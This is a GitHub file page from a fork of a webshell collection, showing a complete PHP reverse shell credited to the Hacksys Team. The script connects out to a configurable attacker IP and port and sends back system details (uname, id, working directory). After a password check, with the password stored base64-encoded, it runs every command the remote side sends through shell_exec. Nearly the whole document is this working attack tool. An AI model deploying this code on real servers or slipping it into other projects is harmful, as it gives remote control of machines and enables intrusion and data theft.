forked from tennc/webshell
-
Notifications
You must be signed in to change notification settings - Fork 1
/
reverseshell-poc.txt
102 lines (92 loc) · 2.91 KB
/
reverseshell-poc.txt
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
<?php
###################################################
# Reverse Shell v1.0 #
# Authentication Feature #
# #
# Hacksys Team - Panthera #
# Author: Ashfaq Ansari #
# http://hacksys.vfreaks.com #
# Designed for Linux #
# Thanks to lionaneesh #
###################################################
ini_set('max_execution_time' ,0);
$VERSION = "1.0";
$ip = "127.0.0.1"; #Change this
$port = 4444; #Change this
$password = base64_decode("aGFja3N5c3RlYW0="); #Default Password: hacksysteam (MD5)
$banner = ("
_ _ _ _____
| | | | | | / ____|
| |__| | __ _ ___| | _| (___ _ _ ___
| __ |/ _` |/ __| |/ /\___ \| | | / __|
| | | | (_| | (__| < ____) | |_| \__ \
|_| |_|\__,_|\___|_|\_\_____/ \__, |___/
_______ __/ |
|__ __| |___/
| | ___ __ _ _ __ ___
| |/ _ \/ _` | '_ ` _ \
| | __/ (_| | | | | | |
|_|\___|\__,_|_| |_| |_|
Reverse Shell in PHP
Author: Ashfaq Ansari
http://hacksys.vfreaks.com/\n\n");
$pwd = shell_exec("pwd");
$sysinfo = shell_exec("uname -a");
$id = shell_exec('id | cut -d "(" -f 2 | cut -d ")" -f 1' );
$date = shell_exec("date");
$len = 1337;
$info =
("
System Information:\n$sysinfo
Current Working Directory: $pwd
User Group: $id
Current Date and Time: $date\n
");
print "\nTrying to connect to: $ip on port $port ...\n\n";
$sockfd = fsockopen($ip , $port , $errno, $errstr );
if($errno != 0)
{
print "\n****** Error Occured ******\nError Nnumber: $errno\nError String: $errstr\n\n";
die(0);
}
else if (!$sockfd)
{
print "Fatal : An unexpected error was occured when trying to connect!\n";
}
else
{
print "Connected to: $ip on port $port ...\n\n";
fputs ($sockfd , $banner);
fputs($sockfd ,"Enter Password: ");
$getpass = trim(fgets($sockfd, strlen($password) + 2));
if ($getpass == $password)
{
fputs($sockfd, "\nAuthentication Successfull..\n");
fputs($sockfd, $info);
while(!feof($sockfd))
{
$cmdPrompt = trim($id) . "@" . trim($ip) . ":~" . trim($pwd) . "# ";
fputs ($sockfd , $cmdPrompt );
$command = trim(fgets($sockfd, $len));
if (trim($command) == "exit")
{
fputs($sockfd ,"\nAborted by user... Exiting..." );
fclose($sockfd);
die(0);
}
fputs($sockfd , "\n" . shell_exec($command) . "\n");
}
fclose($sockfd);
die(0);
}
else
{
fputs($sockfd ,"\nInvalid Password... Quitting...");
fclose($sockfd);
die(0);
}
}
?>